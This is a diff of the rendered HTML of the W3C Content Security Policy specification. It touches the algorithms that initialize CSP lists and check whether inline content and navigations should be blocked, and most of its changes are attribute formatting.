+      <p>A <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑥">Document</a></code>'s <dfn class="dfn-paneled" data-dfn-type="dfn" data-noexport="" id="embedding-document">embedding document</dfn> is the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑦">Document</a></code> <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context-nested-through" id="ref-for-browsing-context-nested-through">through which</a> the <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑧">Document</a></code>'s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context①">browsing context</a> is nested.</p>
+     <li data-md="">
       <p>HTML populates each <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①②">request</a>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-nonce-metadata" id="ref-for-concept-request-nonce-metadata">cryptographic nonce
   metadata</a> and <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-parser-metadata" id="ref-for-concept-request-parser-metadata">parser metadata</a> with relevant data from the
   elements responsible for resource loading.</p>
-      <p class="issue" id="issue-5599665e"><a class="self-link" href="#issue-5599665e"></a> Stylesheet loading is not yet integrated with
+      <p class="issue" id="issue-25da4fba"><a class="self-link" href="#issue-25da4fba"></a> Stylesheet loading is not yet integrated with
   Fetch in WHATWG’s HTML. <a href="https://github.com/whatwg/html/issues/968">&lt;https://github.com/whatwg/html/issues/968></a></p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#allow-base-for-document">§6.2.1.1 Is base allowed for document?</a> is called during <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/semantics.html#the-base-element" id="ref-for-the-base-element">base</a></code>'s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/semantics.html#set-the-frozen-base-url" id="ref-for-set-the-frozen-base-url">set the frozen
   base URL</a> algorithm to ensure that the <code><a data-link-type="element-sub" href="https://html.spec.whatwg.org/multipage/semantics.html#attr-base-href" id="ref-for-attr-base-href">href</a></code> attribute’s value
   is valid.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-plugin-element-be-blocked-a-priori-by-content-security-policy" id="ref-for-should-plugin-element-be-blocked-a-priori-by-content-security-policy">§6.2.2.2 Should plugin element be blocked a priori by Content
     Security Policy?:</a> is called during the processing of <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element" id="ref-for-the-object-element">object</a></code>, <code><a data-link-type="element" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element" id="ref-for-the-embed-element">embed</a></code>, and <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/obsolete.html#applet" id="ref-for-applet"><code>applet</code></a> elements to determine whether they may trigger a fetch.</p>
       <p class="note" role="note"><span>Note:</span> Fetched plugin resources are handled in <a href="#should-block-response">§4.1.4 Should response to request be blocked by Content Security Policy?</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p><a href="#should-block-navigation-request">§4.2.5 Should navigation request of type from source in target be blocked
     by Content Security Policy?</a> is called during the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsing-the-web.html#process-a-navigate-fetch" id="ref-for-process-a-navigate-fetch">process a
   navigate fetch</a> algorithm, and <a href="#should-block-navigation-response">§4.2.6 Should navigation response to navigation request of type from source
@@ -2608,13 +2561,13 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>Given a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document⑨">Document</a></code> (<var>document</var>), a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①⑤">response</a> (<var>response</var>), and a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request" id="ref-for-concept-request①③">request</a> or <code>null</code> (<var>request</var>) the user agent performs the following
   steps in order to initialize <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list">CSP list</a>:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>request</var> is not <code>null</code> and <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-url" id="ref-for-concept-response-url①">url</a>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme">scheme</a> is either a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#local-scheme" id="ref-for-local-scheme②">local scheme</a> or <code>javascript</code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>policy</var> in <var>request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client⑦">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global④">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list⑤">CSP list</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Insert a copy of <var>policy</var> into <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list①">CSP list</a>.</p>
         </ol>
       </ol>
@@ -2626,15 +2579,15 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   in the <a href="#match-url-to-source-expression">§6.6.2.6 Does url match expression in origin with redirect count?</a> algorithm.</p>
       <p class="note" role="note"><span>Note:</span> We do all this to ensure that a page cannot bypass its <a data-link-type="dfn" href="#content-security-policy-object" id="ref-for-content-security-policy-object②⑧">policy</a> by embedding a frame or popping up a new window containing content it
   controls (<code>blob:</code> resources, or <code>document.write()</code>).</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list⑧">CSP list</a>, insert <var>policy</var> into <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list④">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>document</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list⑤">CSP list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Execute <var>directive</var>’s <a data-link-type="dfn" href="#directive-initialization" id="ref-for-directive-initialization">initialization</a> algorithm on <var>document</var> and <var>response</var>.</p>
         </ol>
       </ol>
@@ -2643,41 +2596,41 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p>Given a <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①①">global object</a> (<var>global</var>), and a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response" id="ref-for-concept-response①⑥">response</a> (<var>response</var>), the user agent performs the following steps in order
   to initialize <var>global</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list⑥">CSP list</a>:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-url" id="ref-for-concept-response-url②">url</a>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme①">scheme</a> is a <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#local-scheme" id="ref-for-local-scheme③">local scheme</a>, or if <var>global</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#dedicatedworkerglobalscope" id="ref-for-dedicatedworkerglobalscope">DedicatedWorkerGlobalScope</a></code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>owners</var> be an empty list.</p>
-       <li data-md>
+       <li data-md="">
         <p>Add each of the items in <var>global</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/#concept-WorkerGlobalScope-owner-set" id="ref-for-concept-WorkerGlobalScope-owner-set">owner set</a> to <var>owners</var>.</p>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>owner</var> in <var>owners</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>For each <var>policy</var> in <var>owner</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list⑦">CSP list</a>:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Insert a copy of <var>policy</var> into <var>global</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list⑧">CSP list</a>.</p>
           </ol>
         </ol>
       </ol>
       <p class="note" role="note"><span>Note:</span> <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#local-scheme" id="ref-for-local-scheme④">local scheme</a> includes <code>about:</code>, and this algorithm will
   therefore copy the <a data-link-type="dfn" href="#embedding-document" id="ref-for-embedding-document②">embedding document</a>’s policies for <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/iframe-embed-object.html#an-iframe-srcdoc-document" id="ref-for-an-iframe-srcdoc-document②">an iframe <code>srcdoc</code> <code>Document</code></a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>global</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#sharedworkerglobalscope" id="ref-for-sharedworkerglobalscope">SharedWorkerGlobalScope</a></code> or <code class="idl"><a data-link-type="idl" href="https://w3c.github.io/ServiceWorker/#serviceworkerglobalscope" id="ref-for-serviceworkerglobalscope">ServiceWorkerGlobalScope</a></code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>policy</var> in <var>response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list⑨">CSP list</a>, insert <var>policy</var> into <var>global</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list⑨">CSP list</a>.</p>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>global</var> is a <code class="idl"><a data-link-type="idl" href="https://drafts.css-houdini.org/worklets/#workletglobalscope" id="ref-for-workletglobalscope③">WorkletGlobalScope</a></code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>Let <var>owner</var> be <var>global</var>’s <a data-link-type="dfn" href="https://drafts.css-houdini.org/worklets/#workletglobalscope-owner-document" id="ref-for-workletglobalscope-owner-document">owner document</a>.</p>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>policy</var> in <var>owner</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⓪">CSP list</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>Insert a copy of <var>policy</var> into <var>global</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①①">CSP list</a>.</p>
         </ol>
       </ol>
@@ -2685,15 +2638,15 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <h4 class="heading settled algorithm" data-algorithm="Retrieve the CSP list of an object" data-level="4.2.3" id="get-csp-of-object"><span class="secno">4.2.3. </span><span class="content"> Retrieve the <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①②">CSP list</a> of an <var>object</var> </span><a class="self-link" href="#get-csp-of-object"></a></h4>
     <p>To obtain <var>object</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①③">CSP list</a>:</p>
     <ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>object</var> is a <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①⓪">Document</a></code> return <var>object</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list⑥">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>object</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/window-object.html#window" id="ref-for-window①">Window</a></code> return <var>object</var>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/window-object.html#concept-document-window" id="ref-for-concept-document-window">associated <code>Document</code></a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/dom.html#concept-document-csp-list" id="ref-for-concept-document-csp-list⑦">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>object</var> is a <code class="idl"><a data-link-type="idl" href="https://html.spec.whatwg.org/multipage/workers.html#workerglobalscope" id="ref-for-workerglobalscope③">WorkerGlobalScope</a></code>, return <var>object</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①④">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>If <var>object</var> is a <code class="idl"><a data-link-type="idl" href="https://drafts.css-houdini.org/worklets/#workletglobalscope" id="ref-for-workletglobalscope④">WorkletGlobalScope</a></code>, return <var>object</var>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⑤">CSP list</a>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Return <code>null</code>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should element’s inline type behavior be blocked by Content Security Policy?" data-level="4.2.4" id="should-block-inline"><span class="secno">4.2.4. </span><span class="content"> Should <var>element</var>’s inline <var>type</var> behavior be blocked by Content Security Policy? </span><a class="self-link" href="#should-block-inline"></a></h4>
@@ -2704,42 +2657,42 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
     <p class="note" role="note"><span>Note:</span> The valid values for <var>type</var> are "<code>script</code>", "<code>script attribute</code>",
   "<code>style</code>", and "<code>style attribute</code>".</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p class="assertion">Assert: <var>element</var> is not <code>null</code>.</p>
-     <li data-md>
+     <li data-md="">
       <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>element</var>’s <code class="idl"><a data-link-type="idl" href="https://dom.spec.whatwg.org/#document" id="ref-for-document①①">Document</a></code>'s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#global-object" id="ref-for-global-object①②">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⑥">CSP list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>’s <a data-link-type="dfn" href="#policy-directive-set" id="ref-for-policy-directive-set⑥">directive set</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check">inline check</a> returns
   "<code>Allowed</code>" when executed upon <var>element</var>, <var>type</var>, <var>policy</var> and <var>source</var>,
   skip to the next <var>directive</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Let <var>directive-name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Otherwise, let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on the <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#current-settings-object" id="ref-for-current-settings-object">current settings
   object</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global⑤">global object</a>, <var>policy</var>,
   and <var>directive-name</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource②">resource</a> to "<code>inline</code>".</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-element" id="ref-for-violation-element">element</a> to <var>element</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-value" id="ref-for-directive-value④">value</a> <a data-link-type="dfn" href="https://infra.spec.whatwg.org/#list-contain" id="ref-for-list-contain①">contains</a> the
   expression "<a data-link-type="grammar" href="#grammardef-report-sample" id="ref-for-grammardef-report-sample①"><code>'report-sample'</code></a>", then set <var>violation</var>’s <a data-link-type="dfn" href="#violation-sample" id="ref-for-violation-sample②">sample</a> to the substring of <var>source</var> containing its first 40
   characters.</p>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①①">disposition</a> is "<code>enforce</code>", then
   set <var>result</var> to "<code>Blocked</code>".</p>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>result</var>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should navigation request of type from source in target be blocked
@@ -2749,57 +2702,57 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   "<code>form-submission</code>" or "<code>other</code>"), and two <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/browsers.html#browsing-context" id="ref-for-browsing-context②">browsing contexts</a> (<var>source</var> and <var>target</var>), this algorithm return "<code>Blocked</code>" if the active policy blocks
   the navigation, and "<code>Allowed</code>" otherwise:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client⑧">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global⑥">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⑦">CSP list</a>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-pre-navigation-check" id="ref-for-directive-pre-navigation-check">pre-navigation check</a> returns "<code>Allowed</code>" when executed upon <var>navigation request</var>, <var>type</var>, and <var>policy</var> skip to the next <var>directive</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Otherwise, let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client⑨">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global⑦">global object</a>, <var>policy</var>, and <var>directive</var>’s <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name③">name</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource③">resource</a> to <var>navigation
   request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url②">URL</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①②">disposition</a> is "<code>enforce</code>", then
   set <var>result</var> to "<code>Blocked</code>".</p>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>If <var>result</var> is "<code>Allowed</code>", and if <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-current-url" id="ref-for-concept-request-current-url①">current URL</a>’s <a data-link-type="dfn" href="https://url.spec.whatwg.org/#concept-url-scheme" id="ref-for-concept-url-scheme②">scheme</a> is <code>javascript</code>:</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>policy</var> in <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①⓪">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global⑧">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⑧">CSP list</a>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>For each <var>directive</var> in <var>policy</var>:</p>
           <ol>
-           <li data-md>
+           <li data-md="">
             <p>Let <var>directive-name</var> be the result of executing <a href="#effective-directive-for-inline-check">§6.7.2 Get the effective directive for inline checks</a> on <var>type</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-inline-check" id="ref-for-directive-inline-check①">inline check</a> returns "<code>Allowed</code>" when executed upon <code>null</code>,
   "<code>navigation</code>" and <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-current-url" id="ref-for-concept-request-current-url②">current URL</a>,
   skip to the next <var>directive</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>Otherwise, let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①①">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global⑨">global object</a>, <var>policy</var>, and <var>directive-name</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource④">resource</a> to <var>navigation
   request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url③">URL</a>.</p>
-           <li data-md>
+           <li data-md="">
             <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-           <li data-md>
+           <li data-md="">
             <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①③">disposition</a> is "<code>enforce</code>", then
   set <var>result</var> to "<code>Blocked</code>".</p>
           </ol>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>result</var>.</p>
     </ol>
     <h4 class="heading settled algorithm" data-algorithm="Should navigation response to navigation request of type from source
@@ -2810,54 +2763,54 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   returns "<code>Blocked</code>" if the active policy blocks the navigation, and "<code>Allowed</code>"
   otherwise:</p>
     <ol class="algorithm">
-     <li data-md>
+     <li data-md="">
       <p>Let <var>result</var> be "<code>Allowed</code>".</p>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>navigation response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-csp-list" id="ref-for-concept-response-csp-list①⓪">CSP list</a>:</p>
       <p class="note" role="note"><span>Note:</span> Some directives (like <a data-link-type="dfn" href="#frame-ancestors" id="ref-for-frame-ancestors">frame-ancestors</a>) allow a <var>response</var>’s <a data-link-type="dfn" href="#content-security-policy" id="ref-for-content-security-policy">Content Security Policy</a> to act on the navigation.</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-navigation-response-check" id="ref-for-directive-navigation-response-check">navigation response check</a> returns "<code>Allowed</code>" when executed upon <var>navigation request</var>, <var>type</var>, <var>navigation response</var>, <var>target</var>, "<code>response</code>", and <var>policy</var> skip to the next <var>directive</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Otherwise, let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <code>null</code>, <var>policy</var>, and <var>directive</var>’s <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name④">name</a>.</p>
           <p class="note" role="note"><span>Note:</span> We use <code>null</code> for the global object, as no global exists:
   we haven’t processed the navigation to create a Document yet.</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource⑤">resource</a> to <var>navigation
   response</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-response-url" id="ref-for-concept-response-url③">URL</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①④">disposition</a> is "<code>enforce</code>", then
   set <var>result</var> to "<code>Blocked</code>".</p>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>For each <var>policy</var> in <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①②">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global①⓪">global object</a>’s <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list①⑨">CSP list</a>:</p>
       <p class="note" role="note"><span>Note:</span> Some directives in the <var>navigation request</var>’s context (like <a data-link-type="dfn" href="#navigate-to" id="ref-for-navigate-to①">navigate-to</a>)
   need the <var>response</var> before acting on the navigation.</p>
       <ol>
-       <li data-md>
+       <li data-md="">
         <p>For each <var>directive</var> in <var>policy</var>:</p>
         <ol>
-         <li data-md>
+         <li data-md="">
           <p>If <var>directive</var>’s <a data-link-type="dfn" href="#directive-navigation-response-check" id="ref-for-directive-navigation-response-check①">navigation response check</a> returns "<code>Allowed</code>" when executed upon <var>navigation request</var>, <var>type</var>, <var>navigation response</var>, <var>target</var>, "<code>source</code>", and <var>policy</var> skip to the next <var>directive</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Otherwise, let <var>violation</var> be the result of executing <a href="#create-violation-for-global">§2.4.1 Create a violation object for global, policy, and directive</a> on <var>navigation request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-client" id="ref-for-concept-request-client①③">client</a>’s <a data-link-type="dfn" href="https://html.spec.whatwg.org/multipage/webappapis.html#concept-settings-object-global" id="ref-for-concept-settings-object-global①①">global object</a>, <var>policy</var>, and <var>directive</var>’s <a data-link-type="dfn" href="#directive-name" id="ref-for-directive-name⑤">name</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Set <var>violation</var>’s <a data-link-type="dfn" href="#violation-resource" id="ref-for-violation-resource⑥">resource</a> to <var>navigation
   request</var>’s <a data-link-type="dfn" href="https://fetch.spec.whatwg.org/#concept-request-url" id="ref-for-concept-request-url④">URL</a>.</p>
-         <li data-md>
+         <li data-md="">
           <p>Execute <a href="#report-violation">§5.3 Report a violation</a> on <var>violation</var>.</p>
-         <li data-md>
+         <li data-md="">
           <p>If <var>policy</var>’s <a data-link-type="dfn" href="#policy-disposition" id="ref-for-policy-disposition①⑤">disposition</a> is "<code>enforce</code>", then
   set <var>result</var> to "<code>Blocked</code>".</p>
         </ol>
       </ol>
-     <li data-md>
+     <li data-md="">
       <p>Return <var>result</var>.</p>
     </ol>
     <h3 class="heading settled" data-level="4.3" id="ecma-integration"><span class="secno">4.3. </span><span class="content">Integration with ECMAScript</span><a class="self-link" href="#ecma-integration"></a></h3>
@@ -2865,151 +2818,167 @@ ISSUE: Bikeshed <code>unsafe-allow-redirects</code>.
   which allows the host environment to block the compilation of strings into
   ECMAScript code. This document defines an implementation of that abstract
   operation thich examines the relevant <a data-link-type="dfn" href="#global-object-csp-list" id="ref-for-global-object-csp-list②⓪">CSP list</a> to determine whether such compilation ought to be blocked.</p>
-    <h4 class="heading settled algorithm" data-algorithm="EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source)" data-dfn-type="dfn" data-level="4.3.1" data-lt="EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source)" data-noexport id="can-compile-strings"><span class="secno">4.3.1. </span><span class="content"> EnsureCSPDoesNotBlockStringCompilation(<var>callerRealm</var>, <var>calleeRealm</var>, <var>source</var>) </span><a class="self-link" href="#can-compile-strings"></a></h4>
+    <h4 class="heading settled algorithm" data-algorithm="EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source)" data-dfn-type="dfn" data-level="4.3.1" data-lt="EnsureCSPDoesNotBlockStringCompilation(callerRealm, calleeRealm, source)" data-noexport="" id="can-compile-strings"><span class="secno">4.3.1. </span><span class="content"> EnsureCSPDoesNotBlockStringCompilation(<var>callerRealm</var>, <var>calleeRealm</var>, <var>source</var>) </span><a class="self-link" href="#can-compile-strings"></a></h4>
